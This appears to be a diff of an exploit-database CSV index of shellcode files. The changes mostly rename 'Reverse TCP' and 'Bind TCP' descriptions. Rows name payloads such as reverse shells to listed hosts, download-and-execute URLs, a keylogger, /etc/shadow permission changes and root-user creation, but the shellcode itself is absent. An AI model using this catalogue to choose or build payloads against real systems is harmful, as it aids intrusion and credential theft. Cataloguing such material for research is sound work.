-43746,shellcodes/linux_x86/43746.c,"Linux/x86 - Bind TCP Shell Shellcode (112 bytes)",2013-07-03,"Russell Willis",shellcode,linux_x86
-43747,shellcodes/linux_x86/43747.c,"Linux/x86 - Reverse TCP (127.1.1.1:12345/TCP) cat /etc/passwd Shellcode (111 bytes)",2009-01-01,"Daniel Sauder",shellcode,linux_x86
+43746,shellcodes/linux_x86/43746.c,"Linux/x86 - Bind (/TCP) Shell Shellcode (112 bytes)",2013-07-03,"Russell Willis",shellcode,linux_x86
+43747,shellcodes/linux_x86/43747.c,"Linux/x86 - Reverse (127.1.1.1:12345/TCP) cat /etc/passwd Shellcode (111 bytes)",2009-01-01,"Daniel Sauder",shellcode,linux_x86
 43748,shellcodes/linux_x86/43748.c,"Linux/x86 - Download File (http://192.168.2.222/x) + chmod() + execute Shellcode (108 bytes)",2009-01-01,"Daniel Sauder",shellcode,linux_x86
 43749,shellcodes/linux_x86/43749.asm,"Linux/x86 - execve(/bin/sh) + Using jump/call/pop Shellcode (52 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86
 43750,shellcodes/linux_x86/43750.asm,"Linux/x86 - Copy /etc/passwd to /tmp/outfile Shellcode (97 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86
@@ -734,12 +734,12 @@ id,file,description,date,author,type,platform
 43752,shellcodes/linux_x86/43752.asm,"Linux/x86 - execve() Using JMP-FSTENV Shellcode (67 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86
 43753,shellcodes/linux_x86/43753.c,"Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (51 bytes)",2014-06-22,"Osanda Malith Jayathissa",shellcode,linux_x86
 43754,shellcodes/linux_x86/43754.c,"Linux/x86 - shutdown -h now Shellcode (56 bytes)",2014-06-27,"Osanda Malith Jayathissa",shellcode,linux_x86
-43755,shellcodes/linux_x86/43755.c,"Linux/x86 - Bind TCP (1337/TCP) Shell Shellcode (89 bytes)",2014-07-13,"Julien Ahrens",shellcode,linux_x86
-43756,shellcodes/linux_x86/43756.c,"Linux/x86 - Reverse TCP (127.1.1.1:1337/TCP) Shell Shellcode (74 bytes)",2014-07-25,"Julien Ahrens",shellcode,linux_x86
+43755,shellcodes/linux_x86/43755.c,"Linux/x86 - Bind (1337/TCP) Shell Shellcode (89 bytes)",2014-07-13,"Julien Ahrens",shellcode,linux_x86
+43756,shellcodes/linux_x86/43756.c,"Linux/x86 - Reverse (127.1.1.1:1337/TCP) Shell Shellcode (74 bytes)",2014-07-25,"Julien Ahrens",shellcode,linux_x86
 43757,shellcodes/linux_x86/43757.c,"Linux/x86 - setreuid() + execve(/usr/bin/python) Shellcode (54 bytes)",2014-05-08,"Ali Razmjoo",shellcode,linux_x86
 43758,shellcodes/linux_x86/43758.txt,"Linux/x86 - execve() + ROT-7 Shellcode (Encoder/Decoder) (74 bytes)",2009-01-01,"Stavros Metzidakis",shellcode,linux_x86
-43759,shellcodes/windows_x86/43759.asm,"Windows/x86 (NT/XP/2000/2003) - Bind TCP (8721/TCP) Shell Shellcode (356 bytes)",2009-01-01,"H D Moore",shellcode,windows_x86
-43760,shellcodes/windows_x86/43760.asm,"Windows/x86 (2000) - Reverse TCP (192.168.0.247:8721/TCP) Connect + Vampiric Import Shellcode (179 bytes)",2009-01-01,"H D Moore",shellcode,windows_x86
+43759,shellcodes/windows_x86/43759.asm,"Windows/x86 (NT/XP/2000/2003) - Bind (8721/TCP) Shell Shellcode (356 bytes)",2009-01-01,"H D Moore",shellcode,windows_x86
+43760,shellcodes/windows_x86/43760.asm,"Windows/x86 (2000) - Reverse (192.168.0.247:8721/TCP) Connect + Vampiric Import Shellcode (179 bytes)",2009-01-01,"H D Moore",shellcode,windows_x86
 43761,shellcodes/windows_x86/43761.asm,"Windows/x86 - Create Administrator User (X) Shellcode (304 bytes)",2009-01-01,"H D Moore",shellcode,windows_x86
 43762,shellcodes/windows_x86/43762.c,"Windows/x86 (XP SP3) (French) - Sleep 90 Seconds Shellcode (14 bytes)",2009-01-01,OpTix,shellcode,windows_x86
 43763,shellcodes/windows_x86/43763.txt,"Windows/x86 (XP Professional SP2) (English) - Wordpad.exe Shellcode (15 bytes)",2009-01-01,Aodrulez,shellcode,windows_x86
@@ -754,55 +754,55 @@ id,file,description,date,author,type,platform
 43772,shellcodes/windows_x86/43772.c,"Windows/x86 (XP SP3) (Turkish) - cmd.exe Shellcode (42 bytes)",2009-01-01,ZoRLu,shellcode,windows_x86
 43773,shellcodes/windows_x86/43773.c,"Windows/x86 (XP SP3) (English) - calc.exe Shellcode (16 bytes)",2010-07-10,"John Leitch",shellcode,windows_x86
 43774,shellcodes/windows_x86/43774.c,"Windows/x86 (XP SP3) - MessageBox Shellcode (11 bytes)",2009-01-01,d3c0der,shellcode,windows_x86
-43778,shellcodes/arm/43778.asm,"Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) + Password (MyPasswd) + Null-Free Shellcode (156 bytes)",2018-01-15,rtmcx,shellcode,arm
+43778,shellcodes/arm/43778.asm,"Linux/ARM - Reverse (192.168.1.1:4444/TCP) Shell (/bin/sh) + Password (MyPasswd) + Null-Free Shellcode (156 bytes)",2018-01-15,rtmcx,shellcode,arm
 43897,shellcodes/linux_x86/43897.nasm,"Linux/x86 - Disable ASLR Security + Obfuscated Shellcode (23 bytes)",2018-01-26,0xAlaufi,shellcode,linux_x86
 43890,shellcodes/linux_x86/43890.c,"Linux/x86 - execve(/bin/sh) + ROT-N + Shift-N + XOR-N Encoded Shellcode (77 bytes)",2018-01-23,"Hashim Jawad",shellcode,linux_x86
 40549,shellcodes/windows_x86-64/40549.c,"Windows/x64 - WinExec(cmd.exe) Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
-40560,shellcodes/windows_x86/40560.asm,"Windows/x86 - Reverse UDP (www.example.com:4444/UDP) Keylogger Shellcode (493 bytes)",2016-10-17,Fugu,shellcode,windows_x86
-40781,shellcodes/windows_x86-64/40781.c,"Windows/x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
+40560,shellcodes/windows_x86/40560.asm,"Windows/x86 - Reverse (www.example.com:4444/UDP) Keylogger Shellcode (493 bytes)",2016-10-17,Fugu,shellcode,windows_x86
+40781,shellcodes/windows_x86-64/40781.c,"Windows/x64 - Reverse (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
 40808,shellcodes/linux_x86-64/40808.c,"Linux/x64 - execve(/bin/sh) -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",shellcode,linux_x86-64
 40821,shellcodes/windows_x86-64/40821.c,"Windows/x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
-40872,shellcodes/linux_x86/40872.c,"Linux/x86 - Reverse TCP Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",shellcode,linux_x86
+40872,shellcodes/linux_x86/40872.c,"Linux/x86 - Reverse (/TCP) Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",shellcode,linux_x86
 40924,shellcodes/linux_x86/40924.c,"Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution + Null-Free Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",shellcode,linux_x86
-40981,shellcodes/windows_x86-64/40981.c,"Windows/x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
+40981,shellcodes/windows_x86-64/40981.c,"Windows/x64 - Bind (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
 41072,shellcodes/windows_x86-64/41072.c,"Windows/x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
 41089,shellcodes/linux_x86-64/41089.c,"Linux/x64 - mkdir() Shellcode (25 bytes)",2017-01-18,"Ajith Kp",shellcode,linux_x86-64
-41128,shellcodes/linux_x86-64/41128.c,"Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes)",2017-01-19,"Ajith Kp",shellcode,linux_x86-64
+41128,shellcodes/linux_x86-64/41128.c,"Linux/x64 - Bind (5600/TCP) Shell Shellcode (87 bytes)",2017-01-19,"Ajith Kp",shellcode,linux_x86-64
 41174,shellcodes/linux_x86-64/41174.nasm,"Linux/x64 - execve(/bin/sh) Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",shellcode,linux_x86-64
 41183,shellcodes/linux/41183.c,"Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes)",2017-01-29,odzhancode,shellcode,linux
-41220,shellcodes/generator/41220.c,"Linux - Reverse TCP Shell + Multi/Dual Mode Shellcode (129 bytes) (Generator)",2017-02-02,odzhancode,shellcode,generator
-41282,shellcodes/linux_x86/41282.nasm,"Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Alphanumeric + Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",shellcode,linux_x86
-41375,shellcodes/linux/41375.c,"Linux - Bind TCP Shell + Dual/Multi Mode Shellcode (156 bytes)",2017-02-16,odzhancode,shellcode,linux
+41220,shellcodes/generator/41220.c,"Linux - Reverse (/TCP) Shell + Multi/Dual Mode Shellcode (129 bytes) (Generator)",2017-02-02,odzhancode,shellcode,generator
+41282,shellcodes/linux_x86/41282.nasm,"Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Alphanumeric + Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",shellcode,linux_x86
+41375,shellcodes/linux/41375.c,"Linux - Bind (/TCP) Shell + Dual/Multi Mode Shellcode (156 bytes)",2017-02-16,odzhancode,shellcode,linux
 41381,shellcodes/windows_x86/41381.c,"Windows/x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",shellcode,windows_x86
-41398,shellcodes/linux_x86-64/41398.nasm,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",shellcode,linux_x86-64
+41398,shellcodes/linux_x86-64/41398.nasm,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",shellcode,linux_x86-64
 41403,shellcodes/linux_x86/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,shellcode,linux_x86
 41439,shellcodes/linux_x86-64/41439.c,"Linux/x64 - Egghunter (0xDEADC0DE) Shellcode (38 bytes)",2017-02-23,odzhancode,shellcode,linux_x86-64
 41467,shellcodes/windows_x86/41467.c,"Windows/x86 - Executable Directory Search + Null-Free Shellcode (130 bytes)",2017-02-26,lu0xheap,shellcode,windows_x86
-41468,shellcodes/linux_x86-64/41468.nasm,"Linux/x64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",shellcode,linux_x86-64
-41477,shellcodes/linux_x86-64/41477.c,"Linux/x64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",shellcode,linux_x86-64
-41481,shellcodes/windows_x86/41481.asm,"Windows/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes)",2017-03-01,"Snir Levi",shellcode,windows_x86
+41468,shellcodes/linux_x86-64/41468.nasm,"Linux/x64 - Bind (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",shellcode,linux_x86-64
+41477,shellcodes/linux_x86-64/41477.c,"Linux/x64 - Reverse (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",shellcode,linux_x86-64
+41481,shellcodes/windows_x86/41481.asm,"Windows/x86 - Reverse (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes)",2017-03-01,"Snir Levi",shellcode,windows_x86
 41498,shellcodes/linux_x86-64/41498.nasm,"Linux/x64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64
 41503,shellcodes/linux_x86-64/41503.nasm,"Linux/x64 - Flush IPTables Rules (/sbin/iptables -F) + Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64
 41509,shellcodes/linux_x86-64/41509.nasm,"Linux/x64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64
 41510,shellcodes/linux_x86-64/41510.nsam,"Linux/x64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64
 41581,shellcodes/windows_x86/41581.c,"Windows/x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",shellcode,windows_x86
-43433,shellcodes/linux_x86/43433.c,"Linux/x86 - Reverse TCP (127.1.1.1:8888/TCP) Shell (/bin/sh) + Null-Free Shellcode (67/69 bytes)",2018-01-05,"Nipun Jaswal",shellcode,linux_x86
+43433,shellcodes/linux_x86/43433.c,"Linux/x86 - Reverse (127.1.1.1:8888/TCP) Shell (/bin/sh) + Null-Free Shellcode (67/69 bytes)",2018-01-05,"Nipun Jaswal",shellcode,linux_x86
 43476,shellcodes/linux_x86/43476.c,"Linux/x86 - execve(/bin/dash) Shellcode (30 bytes)",2018-01-10,"Hashim Jawad",shellcode,linux_x86
 43480,shellcodes/alpha/43480.c,"Alpha - /bin/sh Shellcode (80 bytes)",2009-01-01,"Lamont Granquist",shellcode,alpha
 43481,shellcodes/alpha/43481.c,"Alpha - execve() Shellcode (112 bytes)",2009-01-01,anonymous,shellcode,alpha
 43482,shellcodes/alpha/43482.c,"Alpha - setuid() Shellcode (156 bytes)",2009-01-01,anonymous,shellcode,alpha
 43483,shellcodes/bsd_x86/43483.c,"BSD/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh_) Shellcode (36 bytes)",2009-01-01,"Jihyeog Lim",shellcode,bsd_x86
 43489,shellcodes/linux_x86/43489.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (53 bytes)",2018-01-10,"Debashis Pal",shellcode,linux_x86
-43497,shellcodes/arm/43497.asm,"Linux/ARM (Raspberry Pi) - Bind TCP (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (112 bytes)",2018-01-11,Azeria,shellcode,arm
+43497,shellcodes/arm/43497.asm,"Linux/ARM (Raspberry Pi) - Bind (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (112 bytes)",2018-01-11,Azeria,shellcode,arm
 43502,shellcodes/freebsd_x86-64/43502.txt,"FreeBSD/x64 - execve(/bin/sh) Shellcode (28 bytes)",2009-01-01,Gitsnik,shellcode,freebsd_x86-64
-43503,shellcodes/freebsd_x86-64/43503.txt,"FreeBSD/x64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes)",2009-01-11,Gitsnik,shellcode,freebsd_x86-64
+43503,shellcodes/freebsd_x86-64/43503.txt,"FreeBSD/x64 - Bind (/TCP) Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes)",2009-01-11,Gitsnik,shellcode,freebsd_x86-64
 43504,shellcodes/freebsd_x86/43504.asm,"FreeBSD/x86 - execv(/bin/sh) Shellcode (23 bytes)",2009-01-01,Tosh,shellcode,freebsd_x86
 43505,shellcodes/freebsd_x86/43505.c,"FreeBSD/x86 - /sbin/pfctl -F all Shellcode (47 bytes)",2009-01-01,antrhacks,shellcode,freebsd_x86
-43506,shellcodes/freebsd_x86/43506.c,"FreeBSD/x86 - Bind TCP (41254/TCP) Shell (/bin/sh) Shellcode (115 bytes)",2009-01-01,zillion,shellcode,freebsd_x86
+43506,shellcodes/freebsd_x86/43506.c,"FreeBSD/x86 - Bind (41254/TCP) Shell (/bin/sh) Shellcode (115 bytes)",2009-01-01,zillion,shellcode,freebsd_x86
 43507,shellcodes/freebsd_x86/43507.c,"FreeBSD/x86 - reboot() Shellcode (15 bytes)",2009-01-01,zillion,shellcode,freebsd_x86
 43508,shellcodes/irix/43508.c,"IRIX - execve(/bin/sh -c) Shellcode (72 bytes)",2009-01-01,anonymous,shellcode,irix
 43509,shellcodes/irix/43509.c,"IRIX - execve(/bin/sh) Shellcode (43 bytes)",2009-01-01,anonymous,shellcode,irix
-43510,shellcodes/irix/43510.c,"IRIX - Bind TCP Shell (/bin/sh) Shellcode (364 bytes)",2009-01-01,scut/teso,shellcode,irix
+43510,shellcodes/irix/43510.c,"IRIX - Bind (/TCP)Shell (/bin/sh) Shellcode (364 bytes)",2009-01-01,scut/teso,shellcode,irix
 43511,shellcodes/irix/43511.c,"IRIX - execve(/bin/sh) Shellcode (68 bytes)",2009-01-01,scut/teso,shellcode,irix
 43512,shellcodes/irix/43512.c,"IRIX - stdin-read Shellcode (40 bytes)",2009-01-01,scut/teso,shellcode,irix
 43520,shellcodes/arm/43520.c,"Linux/ARM - execve(_/bin/sh__ NULL_ 0) Shellcode (34 bytes)",2017-03-31,dummys,shellcode,arm
@@ -811,62 +811,62 @@ id,file,description,date,author,type,platform
 43532,shellcodes/arm/43532.c,"Linux/ARM - creat(_/root/pwned__ 0777) Shellcode (39 bytes)",2013-09-04,gunslinger_,shellcode,arm
 43533,shellcodes/arm/43533.c,"Linux/ARM - execve(_/bin/sh__ []_ [0 vars]) Shellcode (35 bytes)",2013-09-04,gunslinger_,shellcode,arm
 43534,shellcodes/arm/43534.c,"Linux/ARM - execve(_/bin/sh__NULL_0) Shellcode (31 bytes)",2010-08-31,"Jonathan Salwan",shellcode,arm
-43536,shellcodes/arm/43536.c,"Android/ARM - Reverse TCP (10.0.2.2:0x3412/TCP) Shell (/system/bin/sh) Shellcode (79 bytes)",2009-01-01,"Neil Klopfenstein",shellcode,arm
+43536,shellcodes/arm/43536.c,"Android/ARM - Reverse (10.0.2.2:0x3412/TCP) Shell (/system/bin/sh) Shellcode (79 bytes)",2009-01-01,"Neil Klopfenstein",shellcode,arm
 43537,shellcodes/arm/43537.c,"Linux/StrongARM - setuid() Shellcode (20 bytes)",2009-01-01,funkysh,shellcode,arm
 43538,shellcodes/arm/43538.c,"Linux/StrongARM - execve(/bin/sh) Shellcode (47 bytes)",2009-01-01,funkysh,shellcode,arm
-43539,shellcodes/arm/43539.c,"Linux/StrongARM - Bind TCP Shell (/bin/sh) Shellcode (203 bytes)",2009-01-01,funkysh,shellcode,arm
+43539,shellcodes/arm/43539.c,"Linux/StrongARM - Bind (/TCP) Shell (/bin/sh) Shellcode (203 bytes)",2009-01-01,funkysh,shellcode,arm
 43545,shellcodes/linux_sparc/43545.c,"Linux/SPARC - setreuid(0_0) + execve(/bin/sh) Shellcode (64 bytes)",2009-01-01,anathema,shellcode,linux_sparc
 43541,shellcodes/superh_sh4/43541.c,"Linux/SuperH (sh4) - execve(_/bin/sh__ 0_ 0) Shellcode (19 bytes)",2011-06-22,"Florian Gaultier",shellcode,superh_sh4
-43542,shellcodes/superh_sh4/43542.c,"Linux/SuperH (sh4) - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (132 bytes)",2009-01-01,Dad_,shellcode,superh_sh4
+43542,shellcodes/superh_sh4/43542.c,"Linux/SuperH (sh4) - Bind (31337/TCP) Shell (/bin/sh) Shellcode (132 bytes)",2009-01-01,Dad_,shellcode,superh_sh4
 43546,shellcodes/linux_sparc/43546.c,"Linux/SPARC - setreuid(0_0) + execve() Shellcode (72 bytes)",2009-01-01,"Michel Kaempf",shellcode,linux_sparc
 43549,shellcodes/linux_x86-64/43549.c,"Linux/x64 - Execute /bin/sh Shellcode (27 bytes)",2009-01-01,Dad_,shellcode,linux_x86-64
 43550,shellcodes/linux_x86-64/43550.c,"Linux/x64 - Execute /bin/sh Shellcode (24 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
 43551,shellcodes/linux_x86-64/43551.c,"Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)",2014-10-29,"Osanda Malith Jayathissa",shellcode,linux_x86-64
 43552,shellcodes/linux_x86-64/43552.c,"Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
 43553,shellcodes/linux_x86-64/43553.c,"Linux/x64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
-43554,shellcodes/linux_x86-64/43554.c,"Linux/x64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes)",2009-01-01,Doreth.Z10,shellcode,linux_x86-64
+43554,shellcodes/linux_x86-64/43554.c,"Linux/x64 - Bind (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes)",2009-01-01,Doreth.Z10,shellcode,linux_x86-64
 43555,shellcodes/linux_x86-64/43555.c,"Linux/x64 - shutdown -h now Shellcode (65 bytes)",2014-06-27,"Osanda Malith Jayathissa",shellcode,linux_x86-64
 43556,shellcodes/linux_x86-64/43556.asm,"Linux/x64 - shutdown -h now Shellcode (64 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64
 43557,shellcodes/linux_x86-64/43557.asm,"Linux/x64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64
-43558,shellcodes/linux_x86-64/43558.asm,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)",2014-09-04,Keyman,shellcode,linux_x86-64
-43559,shellcodes/linux_x86-64/43559.asm,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)",2014-09-03,Keyman,shellcode,linux_x86-64
+43558,shellcodes/linux_x86-64/43558.asm,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)",2014-09-04,Keyman,shellcode,linux_x86-64
+43559,shellcodes/linux_x86-64/43559.asm,"Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)",2014-09-03,Keyman,shellcode,linux_x86-64
 43561,shellcodes/linux_x86-64/43561.asm,"Linux/x64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes)",2014-09-21,Keyman,shellcode,linux_x86-64
 41630,shellcodes/linux_x86/41630.asm,"Linux/x86 - exceve(/bin/sh) + Encoded Shellcode (44 bytes)",2017-03-17,WangYihang,shellcode,linux_x86
-41631,shellcodes/linux_x86/41631.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",shellcode,linux_x86
+41631,shellcodes/linux_x86/41631.c,"Linux/x86 - Bind (Random TCP Port) Shell (/bin/sh) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",shellcode,linux_x86
 41635,shellcodes/linux_x86/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 bytes)",2017-03-19,WangYihang,shellcode,linux_x86
 43734,shellcodes/linux_x86/43734.c,"Linux/x86 - Insertion Decoder + Null-Free Shellcode (33+ bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
 43910,shellcodes/linux_x86/43910.c,"Linux/x86 - Egghunter Shellcode (12 Bytes)",2018-01-28,"Nipun Jaswal",shellcode,linux_x86
-43921,shellcodes/arm/43921.asm,"Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh)+ Null-Free Shellcode (80 bytes)",2018-01-28,rtmcx,shellcode,arm
-43951,shellcodes/linux_x86-64/43951.nasm,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)",2017-11-09,0x4ndr3,shellcode,linux_x86-64
-43952,shellcodes/linux_x86-64/43952.nasm,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (104 bytes)",2017-11-11,0x4ndr3,shellcode,linux_x86-64
+43921,shellcodes/arm/43921.asm,"Linux/ARM - Reverse (192.168.1.1:4444/TCP) Shell (/bin/sh)+ Null-Free Shellcode (80 bytes)",2018-01-28,rtmcx,shellcode,arm
+43951,shellcodes/linux_x86-64/43951.nasm,"Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)",2017-11-09,0x4ndr3,shellcode,linux_x86-64
+43952,shellcodes/linux_x86-64/43952.nasm,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (104 bytes)",2017-11-11,0x4ndr3,shellcode,linux_x86-64
 43953,shellcodes/linux_x86-64/43953.nasm,"Linux/x64 - Egghunter (0xbeefbeef) Shellcode (34 bytes)",2017-11-23,0x4ndr3,shellcode,linux_x86-64
 43954,shellcodes/linux_x86-64/43954.nasm,"Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode",2017-12-16,0x4ndr3,shellcode,linux_x86-64
 43955,shellcodes/generator/43955.py,"Linux/x64 - Custom Encoded XOR + Polymorphic + execve(/bin/sh) Shellcode (Generator)",2017-12-19,0x4ndr3,shellcode,generator
 43956,shellcodes/linux_x86-64/43956.c,"Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode",2018-02-02,0x4ndr3,shellcode,linux_x86-64
-44143,shellcodes/arm/44143.s,"Linux/ARM - Bind TCP (4444/TCP) Shell (/bin/sh) + IP Controlled (192.168.1.190) + Null-Free Shellcode (168 bytes)",2018-02-19,rtmcx,shellcode,arm
-42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse TCP (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
-41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse TCP (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86
+44143,shellcodes/arm/44143.s,"Linux/ARM - Bind (4444/TCP) Shell (/bin/sh) + IP Controlled (192.168.1.190) + Null-Free Shellcode (168 bytes)",2018-02-19,rtmcx,shellcode,arm
+42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
+41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86
 41750,shellcodes/linux_x86-64/41750.asm,"Linux/x64 - execve(/bin/sh) Shellcode (21 bytes)",2017-03-28,WangYihang,shellcode,linux_x86-64
 41757,shellcodes/linux_x86/41757.txt,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (4)",2017-03-29,WangYihang,shellcode,linux_x86
 41827,shellcodes/windows_x86-64/41827.asm,"Windows/x64 (10) - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",shellcode,windows_x86-64
 41883,shellcodes/linux_x86-64/41883.txt,"Linux/x64 - execve(/bin/sh) Shellcode (31 bytes) (2)",2017-04-13,WangYihang,shellcode,linux_x86-64
 41909,shellcodes/linux_x86/41909.c,"Linux/x86 - Egghunter (0x50905090) + /bin/sh Shellcode (18 bytes)",2017-04-22,phackt_ul,shellcode,linux_x86
 41969,shellcodes/linux_x86/41969.c,"Linux/x86 - Disable ASLR Security Shellcode (80 bytes)",2017-05-08,abatchy17,shellcode,linux_x86
-41970,shellcodes/linux_x86-64/41970.asm,"Linux/x64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes)",2017-05-08,Srakai,shellcode,linux_x86-64
+41970,shellcodes/linux_x86-64/41970.asm,"Linux/x64 - Reverse (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes)",2017-05-08,Srakai,shellcode,linux_x86-64
 42016,shellcodes/windows/42016.asm,"Windows - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",shellcode,windows
 42126,shellcodes/linux_x86-64/42126.c,"Linux/x64 - execve(/bin/sh) Shellcode (31 bytes) (1)",2017-06-05,"Touhid M.Shaikh",shellcode,linux_x86-64
 42177,shellcodes/linux_x86/42177.c,"Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) + XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,shellcode,linux_x86
 42179,shellcodes/linux_x86-64/42179.c,"Linux/x64 - execve(/bin/sh) Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,shellcode,linux_x86-64
